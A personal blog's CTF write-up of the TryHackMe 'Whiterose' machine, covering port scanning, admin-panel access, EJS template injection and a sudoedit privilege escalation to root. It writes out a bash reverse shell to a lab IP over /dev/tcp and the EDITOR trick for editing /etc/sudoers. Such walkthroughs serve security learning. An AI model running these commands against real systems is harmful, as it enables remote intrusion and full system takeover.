Pythonic01
  • whoami
  • Try Hack Me
    • Billing (THM)
    • Rabbit Store (THM)
    • You Got Mail (THM)
    • Decryptify (THM)
    • Smol (THM)
    • Light
    • Silver Platte (THM)
    • The Sticker Shop(THM)
    • SeeTwo (THM)
    • Whiterose (THM)
    • Mountaineer (THM)
    • The London Bridge (THM)
    • BreakMe (THM)
    • BackTrack (THM)
    • Cheese CTF (THM)
    • Service (THM)
    • LookUp (THM)
  • CVEs
    • CVE-2024-27198
  • HACK THE BOX
    • Cap (HTB)
    • EvilCPUs (HTB)
    • Instant (HTB)
    • Chemistry (HTB)
    • Cicada (HTB)
Powered by GitBook
On this page
  • Intro.
  • Enumeration.
  • Port Scan.
  • enumerate subdomains.
  • accessing admin panel.
  • Accessing admin account.
  • Web Shell.
  • Root Shell.
  • conclusion.
  1. Try Hack Me

Whiterose (THM)

Yet another Mr. Robot themed challenge.

Intro.

Welcome eveyone once again we have another Mr.Robot theme machin by try hack me so excited.

Enumeration.

Port Scan.

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCddbej9ZSf75uuDvLDeym5AYM+loP/3W862HTWjmksh0UuiuIz8UNTrf3ZpgtBej4y3E3EKvOmYFvJHZpFRV/hQBq1oZB3+XXVzb5RovazcnMgvFxI4y5nCQM8qTW09YvBOpzTyYmsKjVRJOfLR+F87g90vNdZ/u8uVl7IH0B6NmhGlCjPMVLRmhz7PuZih38t0WRWPruEY5qGliW0M3ngZXL6MmL1Jo146HtM8GASdt6yV9U3GLa3/OMFVjYgysqUQPrMwvUrQ8tIDnRAH1rsKBxDFotvcfW6mJ1OvojQf8PEw7iI/PNJZWGzkg+bm4/k+6PRjO2v/0V98DlU+gnn
|   256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNMBr/zXjVQItMqdVH12/sZ3rIt2XFsPWRCy4bXCE7InUVg8Q9SVFkOW2LAi1UStP4A4W8yA8hW+1wJaEFP9ffs=
|   256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIdJAkvDVqEAbac77yxYfkM0AU8puWxCyqCBJ9Pd9zCi
80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

As usual we have an SSH, HTTP open ports let's see what we have in HTTP.

enumerate subdomains.

So when i first accessed the web it could not found the domain cyprusbank.thm. So i had to add it into the etc/hosts file. and i tried to use gobuster to enumerate the subdomains and i found this.

And we have a creds which has been given for access this admin panel. and as in the show Eliot uses her to gain access into the Cyprus National Bank.

Olivia Cortez:olivi8

accessing admin panel.

After we access the admin panel we going to find multple transactions in billions.

Accessing admin account.

So after few minutes playing around i found the chat.

The first thing intrest me in the page was the 'c' argument in the url so i play with it do we. and i found that it allow for chat history.

Using this "Gayle Bev" and password. Yeah i forgot we need admin access for the settings we can not access the settings as Olivia Cortez.

using the settings i was able to change the password for 'Tyrell Wellick' to 'password'. But this step was no good.

from here i was able to get the phone number for tyrell Wellic.

Web Shell.

So i think why would be there a setting where i can change the password but it does not work this does not make any sense right ?.

So i start play around and i found out this.

If we deleted the password value from the request it will give us this error indicating that the password is undefined and also tells us that it uses ejs.

EJS (Embedded JavaScript Template) files are a type of template file used in web development, particularly with Node.js and Express.js. They allow developers to separate the presentation layer (HTML) from the business logic (JavaScript) by embedding JavaScript code within an HTML template.

searching a bit on exploit regarding ejs i found this.

which is a CVE effects some versions of ejs. using the payload from the write-up i was able to verify that this version is infected.

so i use a simple reverse shell in upload it to the server.

#!/bin/bash
sh -i >& /dev/tcp/10.11.96.110/9001 0>&1

changing the permission of the file.

Then we just run the send the request and do not forget to setup the listner.

Root Shell.

as for the root shell it was not that hard.

we can see we can use sudo edit to edit some config file let's see if we can take advantage of this.

this repo here shows a CVE which allow us to use vulnerable version of sudo edit to edit any file and therefor we can edit the sudores file to allow us to run any command as root.

export EDITOR="vi -- /etc/sudoers"
sudo sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

we can use the repo or this two commands to get what we want.

after the edit the file should look like this using sudo -l again we can see that we can run anything as root.

conclusion.

PreviousSeeTwo (THM)NextMountaineer (THM)

Last updated 4 months ago

this machine was so good since i love MR. Robot and we can learn a lesson is to update our packages as soon as possible.

😂
LogoGitHub - asepsaepdin/CVE-2023-22809GitHub
LogoEJS, Server side template injection RCE (CVE-2022-29078) - writeupEslam Salem blog